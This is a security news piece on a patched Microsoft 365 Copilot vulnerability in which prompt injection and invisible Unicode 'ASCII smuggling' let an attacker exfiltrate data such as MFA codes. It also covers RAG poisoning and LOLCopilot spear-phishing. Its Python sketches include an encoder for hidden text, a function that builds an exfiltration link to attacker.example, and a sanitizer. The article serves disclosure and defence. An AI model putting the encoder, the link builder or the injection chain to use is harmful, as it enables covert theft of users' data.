News has surfaced of a Microsoft 365 Copilot vulnerability, since patched, that could have allowed the theft of sensitive user information through a technique known as ASCII smuggling.
Security researcher Johann Rehberger described ASCII smuggling as “a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface.”
This means, he explained, that an attacker can have the large language model render data that is invisible to the user and embed it within clickable hyperlinks, in effect staging the data for exfiltration.
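To illustrate the mechanics, here is a minimal Python sketch of the encoding Rehberger describes: printable ASCII shifted into the Unicode Tags block (U+E0000–U+E007F), a range most user interfaces render as nothing at all. The payload text and carrier string are illustrative, not taken from the research.

```python
# Minimal sketch of ASCII smuggling via the Unicode Tags block
# (U+E0000-U+E007F): each printable ASCII character is shifted by
# 0xE0000 into a range that most UIs do not display.

TAG_OFFSET = 0xE0000

def smuggle(text: str) -> str:
    """Map printable ASCII to invisible Unicode tag characters."""
    return "".join(chr(TAG_OFFSET + ord(c)) for c in text if 0x20 <= ord(c) <= 0x7E)

def unsmuggle(text: str) -> str:
    """Recover the hidden ASCII; ignore all other characters."""
    return "".join(
        chr(ord(c) - TAG_OFFSET)
        for c in text
        if 0xE0020 <= ord(c) <= 0xE007E
    )

payload = "MFA code: 123456"                      # illustrative secret
carrier = "Click for details" + smuggle(payload)  # looks benign when rendered
print(carrier)             # most UIs show only "Click for details"
print(unsmuggle(carrier))  # -> "MFA code: 123456"
```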
The complete attack chains several techniques together into a reliable exploit. It involves the following steps:
Triggering a prompt injection via malicious content concealed in a document shared over the chat
Using the prompt injection payload to instruct Copilot to search through additional emails and documents
Leveraging ASCII smuggling to entice the user into clicking a link that exfiltrates valuable data to a third-party server (a hypothetical sketch of this staging step follows the list)
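The staging step in the last item can be illustrated with a short, hypothetical sketch. The domain attacker.example, the query parameter, and the link format are placeholders for illustration, not the actual payload from the research: the secret travels in the query string of the link target, while an invisible tag-encoded copy hides in the anchor text so the rendered chat shows only a benign label.

```python
from urllib.parse import quote

TAG_OFFSET = 0xE0000

def smuggle(text: str) -> str:
    # Shift printable ASCII into the invisible Unicode Tags range.
    return "".join(chr(TAG_OFFSET + ord(c)) for c in text if 0x20 <= ord(c) <= 0x7E)

def stage_exfiltration_link(secret: str, label: str = "Read more") -> str:
    # attacker.example and the 'd' parameter are hypothetical placeholders.
    # A click sends the secret to the third-party server via the URL; the
    # tag-encoded copy in the anchor text is invisible to the user.
    url = "https://attacker.example/collect?d=" + quote(secret)
    return f"[{label}{smuggle(secret)}]({url})"

print(stage_exfiltration_link("MFA code: 123456"))
```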
The net result of the attack is that sensitive data, such as multi-factor authentication (MFA) codes, could be sent to a server under the adversary's control. Microsoft has since addressed the issues following responsible disclosure in January 2024.
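On the rendering side, mitigations for this class of issue generally involve filtering the invisible code points before model output reaches the user. Below is a minimal defensive sketch assuming a simple blocklist of the Tags block plus common zero-width characters; it is one possible mitigation for illustration, not a description of Microsoft's patch.

```python
# Minimal defensive sketch: detect and strip Unicode Tags characters and
# common zero-width code points from model output before it is rendered.
# The blocklist below is an assumption for illustration.

ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF}

def is_invisible(ch: str) -> bool:
    cp = ord(ch)
    return 0xE0000 <= cp <= 0xE007F or cp in ZERO_WIDTH

def sanitize(text: str) -> tuple[str, bool]:
    """Return the cleaned text and whether hidden characters were found."""
    clean = "".join(ch for ch in text if not is_invisible(ch))
    return clean, clean != text

# \U000E004D, \U000E0046, \U000E0041 are the invisible tag forms of "MFA".
clean, tampered = sanitize("Click for details\U000E004D\U000E0046\U000E0041")
print(clean)     # "Click for details"
print(tampered)  # True: invisible tag characters were present
```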
The disclosure coincides with demonstrations of proof-of-concept (PoC) attacks against Microsoft's Copilot that manipulate responses, exfiltrate private data, and evade security protections, underscoring the need to continuously monitor risks associated with artificial intelligence (AI) tools.
The techniques, which Zenity describes in detail, enable malicious actors to carry out indirect prompt injection and retrieval-augmented generation (RAG) poisoning, which can lead to remote code execution-style attacks that take full control of Microsoft Copilot and other AI apps. In one hypothetical scenario, an external attacker with code-execution capabilities could trick Copilot into directing users to phishing pages.
Perhaps one of the most inventive attacks is turning the AI into a spear-phishing machine. Using a red-teaming technique dubbed LOLCopilot, an attacker who has access to a victim's email account can send phishing messages that mimic the compromised user's writing style.
Microsoft has also acknowledged that publicly accessible Copilot bots created with Microsoft Copilot Studio and lacking any authentication safeguards could give threat actors a way to extract sensitive information, provided they have prior knowledge of the Copilot's name or URL.
“Enterprises should evaluate their risk tolerance and exposure to prevent data leaks from Copilots (formerly Power Virtual Agents) and enable data loss prevention and other security controls accordingly to control the creation and publication of Copilots,” Rehberger stated.